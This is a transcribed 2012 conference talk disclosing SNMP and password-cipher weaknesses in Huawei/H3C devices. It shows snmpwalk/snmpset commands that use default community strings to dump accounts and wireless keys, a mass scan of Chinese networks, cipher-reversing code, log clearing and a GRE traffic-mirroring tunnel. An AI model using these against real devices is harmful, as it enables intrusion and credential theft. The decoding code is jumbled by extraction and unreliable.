A	  CouNtrys	  Honorable	  n3twork	                                           deviCes	                                    ...
BACKGROUND	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	     2	  
Disclaimer	  Any	  content	  or	  opinion	  stated	  herein	  is	  that	  of	  myself	  and	  not	  of	  my	  employer.	  ...
POLITICS!	  This	  presentaGon	  does	  not	  care	  about	  the	  poli%cs	  between	  China,	  the	  US	  and	  any	  com...
About	  @grutz….	  PenetraGon	  tester	  	  In	  the	  business	  of	  breaking	  into	  businesses	  business	  business	...
The	  Huawei/H3C/HP	  Timeline	                                                                 Bain	  Capital	  /	       ...
Huawei	  !=	  H3C	  ...except	  when	  they	  are	  (so`ware)	  	  Since	  the	  creaGon	  of	  H3C	  by	  Huawei-­‐3Com	 ...
FX’s	  Huawei	  DEFCON	  Bomb	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	    ...
Huawei’s	  July	  31,	  2012	  Response	  to	  c|net	  hfp://news.cnet.com/8301-­‐1009_3-­‐57482813-­‐83/expert-­‐huawei-­...
LETS	  TALK	  BIG	  BANG	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	     10	  
Overflows	  are	  cool…	  …but	  they’re	  finicky	  lifle	  beasts	  Huawei/H3C	  not	  as	  bad	  as	  Cisco	  IOS	  but,	...
h3c	  (old)	  vs	  hh3c	  (new)	  For a node in the H3C new-style MIB files, its namestarts with hh3c, and its OID starts ...
(T)FTP	  File	  Transfers:	  hh3c-­‐config-­‐man	  Funcaon	                                     OID	                       ...
hh3c-­‐config-­‐man	  caveats	  Support	  it	  spofy	  between	  device	  types	    	  Mostly	  routers	  and	  switches	  ...
Let’s	  script…	                                   hfps://github.com/grutz/h3c-­‐pt-­‐tools/blob/master/hh3c-­‐snmpdl.sh	 ...
HP/H3C,	  SNMP,	  LOCAL	  ACCOUNTS	  AND	  YOU!	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3tw...
Usernames	  and	  Passwords	  in	  SNMP?	  Never!	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3...
Huawei/H3C	  Password	  Encrypaon	  Types	  (h)h3cAuthMode	  designates	  encrypGon	  storage	  type:	     	  0:	  No	  en...
hh3cUserLevel	  /	  hh3cUserState	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	...
What	  is	  MAX-­‐ACCESS	  and	  read-­‐create?	                                   	                                   RFC...
…so	  it’s	  protected,	  right?	  Sure	  it	  is!	             Unless	  you	  know	  the	  SNMP	  READ	  ONLY	  string…	 ...
Lets	  glob	  some	  users!	  $	  snmpwalk	  –c	  public	  –v	  1	  <host>	  	  1.3.6.1.4.1.2011.10.2.12.1.1.1	  	  Walks	...
Let’s	  Weaponize	  it!	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	     23	  
Other	  SNMP	  goodies…	  (h)h3c-­‐dot11-­‐cfg	  –	  (requires	  R/W	  access)	     	  SSID	  /	  PSKs	                   ...
Strap	  In	  and	  Let’s	  Scan	  China!	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  d...
INCONCEIVABLE!	  hfp://www.okean.com/chinacidr.txt	             2,444	  netblocks	             290,118,656	  hosts	       ...
L33t	  b@$h	  sk1ddy	                                   	                                   For	  best	  results	  use	  a...
BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	     28	  
China	  Network	  Device	  Counts	  (Oct	  2012)	                                   140,000	                              ...
Compare	  H3C	  results	  from	  ShodanHQ	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  ...
(h)h3c-­‐user	  Results	  Devices	  with	  locally	  defined	  accounts: 	  15,588	  Devices	  with	  ciphered	  passwords:...
What	  Type	  of	  Accounts	  are	  these?	  Local	  users	  can	  be	  used	  for:	        	  Remote	  management	  acces...
Device	  type	  breakdown	  Huawei/H3C	  VRP: 	   	   	   	                                           	  2,293	  SecPath/S...
SO	  ABOUT	  THAT	  CIPHER…	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	     3...
Huawei/H3C	  Not	  Unique	  In	  This	  Weak	  and	  reversible	  ciphers	  seem	  to	  be	  a	  standard	  for	  all	  Ne...
Cipher	  Examples	  CLEARTEXT	                                   CIPHER	  a	                                           D(H...
Want	  more	  examples?	  jfgi!	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	  ...
This	  means	  something…	  Ciphers	  are	  24	  or	  88	  chars	  in	  length	  	  ‘!!’	  at	  the	  end	  of	  everythin...
Probably	  using	  a	  block-­‐based	  cipher	  IdenGcal	  plaintext	  blocks	  encrypt	  to	  idenGcal	  cipher	  blocks:...
Binary/ASCII	  Encoding	  Let’s	  assume	  DES-­‐EBC:	                     	  Probably	  a	  staGc	  key	                 ...
Lets	  decode	  to	  binary!	  result	  =	  bytearray()	                                                        	  cv1	  =...
Huawei’s	  Soluaon	  Use	  AES-­‐256	  and	  updated	  so`ware	  for	  SNMP	  	  Yes..	  AES-­‐256..	  A	  symmetric	  cip...
HP/H3C’s	  Soluaon	  Use	  SHA-­‐256	  on	  those	  systems	  that	  support	  it	  	  Upgrade	  your	  code	  for	  the	 ...
So	  about	  this	  SHA-­‐256…	  Yeah,	  salted	  SHA-­‐256.	  Not	  reversible	  but	  crackable!	  	  	  h3c:$eoaM56nX$f...
NOW	  WHAT?	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	     45	  
Things	  to	  watch	  out	  for	  All	  commands	  are	  logged	  locally	       	  >	  reset	  logbuffer	  	  Keyboard	  k...
See	  All	  Packets!!!	  <rtr1> system-view[rtr-1] interface tunnel 1/0/1[rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255...
PROTECT	  YOURSELF	  BayThreat	  2012	  -­‐-­‐	  @grutz	     A	  CouNtry’s	  Honorable	  n3twork	  deviCes	     48	  
Be	  protected..	  Be	  be	  protected!	  Dont	  configure	  local	  accounts,	  use	  RADIUS	  or	  TACACS+	  	  Dont	  co...
hfp://github.com/grutz/h3c-­‐pt-­‐tools/	        hfp://grutztopia.jingojango.net/	        	        	        Thanks	  to	  ...
Upcoming SlideShare
Loading in …5
×

A CouNtry's Honerable n3twork deviCes

4,995 views

Published on

A discussion on the weaknesses of SNMP and the password cipher used in Huawei and HP/H3C devices. Presented at BayThreat 3 (2012) on December 7, 2012.

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
4,995
On SlideShare
0
From Embeds
0
Number of Embeds
693
Actions
Shares
0
Downloads
48
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

A CouNtry's Honerable n3twork deviCes

  1. 1. A  CouNtrys  Honorable  n3twork   deviCes   Bay  Threat  2012   @grutz  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes  
  2. 2. BACKGROUND  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   2  
  3. 3. Disclaimer  Any  content  or  opinion  stated  herein  is  that  of  myself  and  not  of  my  employer.  The  informaGon  is  being  provided  “as-­‐is”  and  as  a  convenience,  for  informaGonal  purposes  only.  Any  resemblance  to  real  persons,  living  or  dead,  is  purely  coincidental.  No  warranty  is  expressed  or  implied.  Not  responsible  for  direct,  indirect,  incidental  or  consequenGal  damages  resulGng  from  any  defect,  error  or  failure  to  perform.  For  recreaGonal  use  only.  May  be  too  intense  for  some  viewers.  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   3  
  4. 4. POLITICS!  This  presentaGon  does  not  care  about  the  poli%cs  between  China,  the  US  and  any  companies    Data  is  presented  to  show  the  pervasive  risk  these  new  vulnerabiliGes  create    China  was  only  used  because  they  have  the  largest  install  base  of  Huawei  and  H3C  equipment  available  via  the  Internet!  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   4  
  5. 5. About  @grutz….  PenetraGon  tester    In  the  business  of  breaking  into  businesses  business  business  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   5  
  6. 6. The  Huawei/H3C/HP  Timeline   Bain  Capital  /   Huawei-­‐3Com   Huawei  /   HP  Acquires   Partnership   3Com  deal   H3C   2006   Sep  28,  2007   April  12,  2010   H3C  is  born!   US  Gov’t   US  Gov’t   Smackdown   Huawei/ZTE   May  7,  2007   2008   Smackdown     Oct  8,  2012  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   6  
  7. 7. Huawei  !=  H3C  ...except  when  they  are  (so`ware)    Since  the  creaGon  of  H3C  by  Huawei-­‐3Com  the  two  companies  diverged  their  product  lines.  Yet  they  sGll  shared  a  very  similar  code  origin  (and  bugs!)    VulnerabiliGes  described  here  and  in  FX’s  talk  can  generally  affect  Huawei  devices  in  the  Huawei-­‐3Com  years  (2006-­‐2010)  and  all  H3C  devices      BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   7  
  8. 8. FX’s  Huawei  DEFCON  Bomb  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   8  
  9. 9. Huawei’s  July  31,  2012  Response  to  c|net  hfp://news.cnet.com/8301-­‐1009_3-­‐57482813-­‐83/expert-­‐huawei-­‐routers-­‐are-­‐riddled-­‐with-­‐vulnerabiliGes/   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   9  
  10. 10. LETS  TALK  BIG  BANG  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   10  
  11. 11. Overflows  are  cool…  …but  they’re  finicky  lifle  beasts  Huawei/H3C  not  as  bad  as  Cisco  IOS  but,  sGll..  How  many  Gmes  have  you  used  an  IOS  buffer  overflow?   No,  really…   Be  serious  here!    Now  how  many  Gmes  have  you  used  SNMP  to  download  device  configs?    Which  would  you  rely  upon  for  network  penetraGon?  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   11  
  12. 12. h3c  (old)  vs  hh3c  (new)  For a node in the H3C new-style MIB files, its namestarts with hh3c, and its OID starts with1.3.6.1.4.1.25506; for a node in the H3C compatible-style MIB files, its name starts with h3c, and itsOID starts with 1.3.6.1.4.1.2011.10.For example, node hh3cCfgOperateType with the OID of1.3.6.1.4.1.25506.2.4.1.2.4.1.2 is in file hh3c-config-man.mib, and node h3cCfgOperateType with theOID of 1.3.6.1.4.1.2011.10.2.4.1.2.4.1.2 is in fileh3c-config-man.mib. Both of the two nodes indicatethe same variable in the agent, but they are indifferent MIB style.By default, devices use H3C new-style MIB files;http://www.h3c.com/portal/Products___Solutions/Technology/System_Management/Configuration_Example/200912/656452_57_0.htm#_Toc247357228BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   12  
  13. 13. (T)FTP  File  Transfers:  hh3c-­‐config-­‐man  Funcaon   OID   Operator  OperaGon  type   1.3.6.1.4.1.25506.2.4.1.2.4.1.2.xx   1  –  running2Startup   2  –  startup2Running   3  –  running2Net   4  –  net2Running   5  –  net2Startup   6  –  startup2Net  Protocol   1.3.6.1.4.1.25506.2.4.1.2.4.1.3.xx   1  –  `p   2  –  qtp   3  –  cluster`p   4  –  clusterqtp  Filename   1.3.6.1.4.1.25506.2.4.1.2.4.1.4.xx   filename  DesGnaGon  IP  Address   1.3.6.1.4.1.25506.2.4.1.2.4.1.5.xx   IpAddress  Username   1.3.6.1.4.1.25506.2.4.1.2.4.1.6.xx   FTP  Username  Password   1.3.6.1.4.1.25506.2.4.1.2.4.1.7.xx   FTP  Password  RowStatus   1.3.6.1.4.1.25506.2.4.1.2.4.1.9.xx   4  –  go  go  go  move  move  move!   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   13  
  14. 14. hh3c-­‐config-­‐man  caveats  Support  it  spofy  between  device  types    Mostly  routers  and  switches  work    H3C  ERxxxx  Series:  OpType  =  1  (system2net)  Downloads  are  logged  Requires  Read/Write  community  string  Buggy!    Manual  “snmpset”  worked  some  of  the  Gme    Metasploit  module  worked  some  of  the  Gme  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   14  
  15. 15. Let’s  script…   hfps://github.com/grutz/h3c-­‐pt-­‐tools/blob/master/hh3c-­‐snmpdl.sh  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   15  
  16. 16. HP/H3C,  SNMP,  LOCAL  ACCOUNTS  AND  YOU!  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   16  
  17. 17. Usernames  and  Passwords  in  SNMP?  Never!  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   17  
  18. 18. Huawei/H3C  Password  Encrypaon  Types  (h)h3cAuthMode  designates  encrypGon  storage  type:    0:  No  encrypGon    3:  Ciphertext  “encrypGon”      7-­‐CZB#/YX]KQ=^Q`MAF4<1!!    9:  SHA-­‐256  encrypGon      $key$hash_digest_value      (Since  2007,  Mostly  AR  devices)  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   18  
  19. 19. hh3cUserLevel  /  hh3cUserState  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   19  
  20. 20. What  is  MAX-­‐ACCESS  and  read-­‐create?     RFC-­‐1902:  SMI  for  SNMPv2  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   20  
  21. 21. …so  it’s  protected,  right?  Sure  it  is!   Unless  you  know  the  SNMP  READ  ONLY  string…   This  was  probably  a  bug…  or  a  misunderstanding…  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   21  
  22. 22. Lets  glob  some  users!  $  snmpwalk  –c  public  –v  1  <host>    1.3.6.1.4.1.2011.10.2.12.1.1.1    Walks  the  locally  defined  list  of  users:     local user <username> password <clear|cipher|sha256> <value> level [0|1|2|3]    BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   22  
  23. 23. Let’s  Weaponize  it!  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   23  
  24. 24. Other  SNMP  goodies…  (h)h3c-­‐dot11-­‐cfg  –  (requires  R/W  access)    SSID  /  PSKs   snmpwalk –v 1 –c private ip-address 1.3.6.1.4.1.2011.10.2.75  (h)h3c-­‐ssh  -­‐  (requires  R/W  access)   SSH  Server  disabled?  Enable  it!   snmpset –v 1 –c private ip-address 1.3.6.1.4.1.25506.2.22.1.1.1.7 i 1    BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   24  
  25. 25. Strap  In  and  Let’s  Scan  China!  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   25  
  26. 26. INCONCEIVABLE!  hfp://www.okean.com/chinacidr.txt   2,444  netblocks   290,118,656  hosts   Only  care  about  SNMP    Onesixtyone  to  the  rescue!   Originally  by  Solar  Eclipse   Updated  in  2011  by  Paul  Flo  Williams:   hfps://github.com/hisdeedsaredust/onesixtyone  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   26  
  27. 27. L33t  b@$h  sk1ddy     For  best  results  use  a  VPS/host  from  a  country  China  trusts  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   27  
  28. 28. BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   28  
  29. 29. China  Network  Device  Counts  (Oct  2012)   140,000   120,000   Huawei  /  H3C,   117,033   100,000   Huawei  /  H3C,   88,517   80,000   ZTE,  64,579   SNMP  R/O   60,000   SNMP  R/W   40,000   ZTE,  33,669   20,000   Cisco,  11,278   vxWorks,  8,121   0   Cisco,  2,475   Juniper,  273   99   -­‐20,000     Source:  Personal  scan  of  China  Netblock  ranges  using  SNMP  strings   “public”,  “private”,  “h3c”,  “china”  and  “telecom”  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   29  
  30. 30. Compare  H3C  results  from  ShodanHQ  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   30  
  31. 31. (h)h3c-­‐user  Results  Devices  with  locally  defined  accounts:  15,588  Devices  with  ciphered  passwords:      5,132  Devices  with  cleartext  passwords:      15,263    Total  accounts/passwords:    33,938  Unique  passwords:        3,898  Username  ==  Password:    2,101  Unique  version  strings:      686    A  majority  of  cleartext-­‐only  passwords  were  from  one  Telecom  company.  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   31  
  32. 32. What  Type  of  Accounts  are  these?  Local  users  can  be  used  for:    Remote  management  access  (telnet,  ssh,  web)    VPN  access    In  most  cases  telnet,  ssh  and  hfp  were  open  on  devices  with  locally  defined  accounts.  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   32  
  33. 33. Device  type  breakdown  Huawei/H3C  VRP:          2,293  SecPath/SecBlade  Firewalls:    464  WA2xxx  Access  Points:      2,771  Huawei  Quidway:          3,205        BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   33  
  34. 34. SO  ABOUT  THAT  CIPHER…  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   34  
  35. 35. Huawei/H3C  Not  Unique  In  This  Weak  and  reversible  ciphers  seem  to  be  a  standard  for  all  Networking  companies  at  one  Gme:    Cisco  Type  7  Vinegere  cipher    Juniper  $9$    Generally  these  are  used  because  some  protocols  need  to  use  cleartext  passwords  yet  these  should  not  be  stored  in  the  clear.    So….why  not  ROT13?  Just  as  secure…….  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   35  
  36. 36. Cipher  Examples  CLEARTEXT   CIPHER  a   D(HD%5.*MN;Q=^Q`MAF4<1!!  aa   P+J^5@ZGG[3Q=^Q`MAF4<1!!  aaa   +Q4Z3D_*-­‐N[Q=^Q`MAF4<1!!  123   7-­‐CZB#/YX]KQ=^Q`MAF4<1!!  aaaa   EHHC8L%9.F3Q=^Q`MAF4<1!!  aaaaa   X`9:NJ_A#$WQ=^Q`MAF4<1!!  aaaaaa   B.7)"^_<OGCQ=^Q`MAF4<1!!  huawei   N`C55QK<`=/Q=^Q`MAF4<1!!  aaaaaaaa   2P;JH_C3+_Q=^Q`MAF4<1!!   2P;JH_C3+^^KG@[*)9LZ*ZYF[R$:5M(0=0)*5WWQ=^Q`MAF4<<"TXaaaaaaaaaaaaaaaaaaaa   $_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!   2P;JH_C3+^^KG@[*)9LU<WK:`IEBCP2P;JH_C3+_Q=^Q`MAF4<<"TXaaaaaaaaaaaaaaaaaaaaaaaa $_S#6.NM(0=0)*5WWQ=^Q`MAF4<1!!  aaaaaaaa  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   36  
  37. 37. Want  more  examples?  jfgi!  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   37  
  38. 38. This  means  something…  Ciphers  are  24  or  88  chars  in  length    ‘!!’  at  the  end  of  everything   Base64  rotaGonal?    Good  idea,  but   no…  didn’t  pan  out.    Consistent  last  few  bytes  of  data:   Q=^Q`MAF4<1!!    Consistent  first  10  bytes  (2P;JH_C3’+)  when  the  cleartext  is  =>  8  characters  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   38  
  39. 39. Probably  using  a  block-­‐based  cipher  IdenGcal  plaintext  blocks  encrypt  to  idenGcal  cipher  blocks:        BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   39  
  40. 40. Binary/ASCII  Encoding  Let’s  assume  DES-­‐EBC:    Probably  a  staGc  key    Input  =  cleartext  +  null  padding              Output  =  binary  data  Binary  result  converted  to  printable  ASCII  ASCII  NOT  Base64  but  similar  (4  chars  to  3  bytes)      A  consistent  cipher  string  length  based  on  source  length  means  we’re  probably  correct.      BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   40  
  41. 41. Lets  decode  to  binary!  result  =  bytearray()    cv1  =  ord(cipher[cipher_loc])      if  cv1  !=  chkval:  chkval  =  ord(a)      cv2  =  cv2  <<  6  cipher_loc  =  0    else:        cv1  =  ord(?)  #  converter  works  in  groups  of  4  until    #  cipherlen  is  reached    #  group  4  for  cnt  in  range(0,  cipherlen,  4):    cv1  =  cv1-­‐33    #  group  1    cv2  =  cv2  |  cv1    cv1  =  ord(cipher[cipher_loc])    cipher_loc  +=  1    if  cv1  ==  chkval:    cv1  =  ord(cipher[cipher_loc])      cv1  =  ord(?)    if  cv1  !=  chkval:        cv2  =  cv2  <<  6    #  group  2    else:    cv2  =  cv1-­‐33      cv1  =  ord(?)    cipher_loc  +=  1      cv1  =  ord(cipher[cipher_loc])    #  output    if  cv1  !=  chkval:    cv1  =  cv1-­‐33      cv2  =  cv2  <<  6    cv2  =  cv2  |  cv1    else:    cipher_loc  +=  1      cv1  =  ord(?)      #  group  3   result.append((cv2  &  0xff0000)  >>  16)    cv1  =  cv1-­‐33   result.append((cv2  &  0xff00)  >>  8)    cv2  =  cv2  |  cv1   result.append(cv2  &  0xff)    cipher_loc  +=  1      BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   41  
  42. 42. Huawei’s  Soluaon  Use  AES-­‐256  and  updated  so`ware  for  SNMP    Yes..  AES-­‐256..  A  symmetric  cipher.    hfp://support.huawei.com/enterprise/ReadLatestNewsAcGon.acGon?contentId=NEWS1000001141    BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   42  
  43. 43. HP/H3C’s  Soluaon  Use  SHA-­‐256  on  those  systems  that  support  it    Upgrade  your  code  for  the  SNMP  fix.    hfps://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-­‐c03515685    BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   43  
  44. 44. So  about  this  SHA-­‐256…  Yeah,  salted  SHA-­‐256.  Not  reversible  but  crackable!      h3c:$eoaM56nX$ff570abf74e0f5e24b1b6d7438bf9260f2c402934985bf694412cf45dc2e34f5  pw:$8fRj3Ju.$f54c881eb4099465ef619dd3993a63fa8993cd24a45f424d101c293734531878        BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   44  
  45. 45. NOW  WHAT?  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   45  
  46. 46. Things  to  watch  out  for  All  commands  are  logged  locally    >  reset  logbuffer    Keyboard  keys  are  very  annoying    Backspace  is  not  backspace,  unless  it’s  ^H      BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   46  
  47. 47. See  All  Packets!!!  <rtr1> system-view[rtr-1] interface tunnel 1/0/1[rtr-1-Tunnel1/0/1] ip address 10.10.10.1 255.255.255.0[rtr-1-Tunnel1/0/1] tunnel-protocol gre[rtr-1-Tunnel1/0/1] source 10.10.1.1[rtr-1-Tunnel1/0/1] destination 192.168.1.1[rtr-1-Tunnel1/0/1] quit[rtr-1] ip route-static 192.168.2.1 255.255.255.0 tunnel 1/0/1linux# modprobe ip_grelinux# ip tunnel add gre0 mode gre remote 10.10.1.1 local192.168.1.1 ttl 255linux# ip link set gre0 upLinux# ip addr add 10.10.10.2/24 dev gre0  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   47  
  48. 48. PROTECT  YOURSELF  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   48  
  49. 49. Be  protected..  Be  be  protected!  Dont  configure  local  accounts,  use  RADIUS  or  TACACS+    Dont  configure  SNMPv1    Dont  use  default  SNMP  strings    Disable  the  snmp  view  for  (h)h3c-­‐user:   snmp-­‐agent  mib-­‐view  excluded  1.3.6.1.4.1.2011.10.2.12.1.1.1   snmp-­‐agent  mib-­‐view  excluded  1.3.6.1.4.1.25506.2.12.1.1.1    Use  SHA256  passwords  if  your  image  supports  it   BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   49  
  50. 50. hfp://github.com/grutz/h3c-­‐pt-­‐tools/   hfp://grutztopia.jingojango.net/       Thanks  to  #metasploit,  hdm,  FX,  eMaze  (Ivan  and  Roberto),  HP/H3C  and  Huawei  IRTs,  US-­‐ CERT  and  others  whom  I  may  have  forgofen       QUESTIONS?  BayThreat  2012  -­‐-­‐  @grutz   A  CouNtry’s  Honorable  n3twork  deviCes   50  

×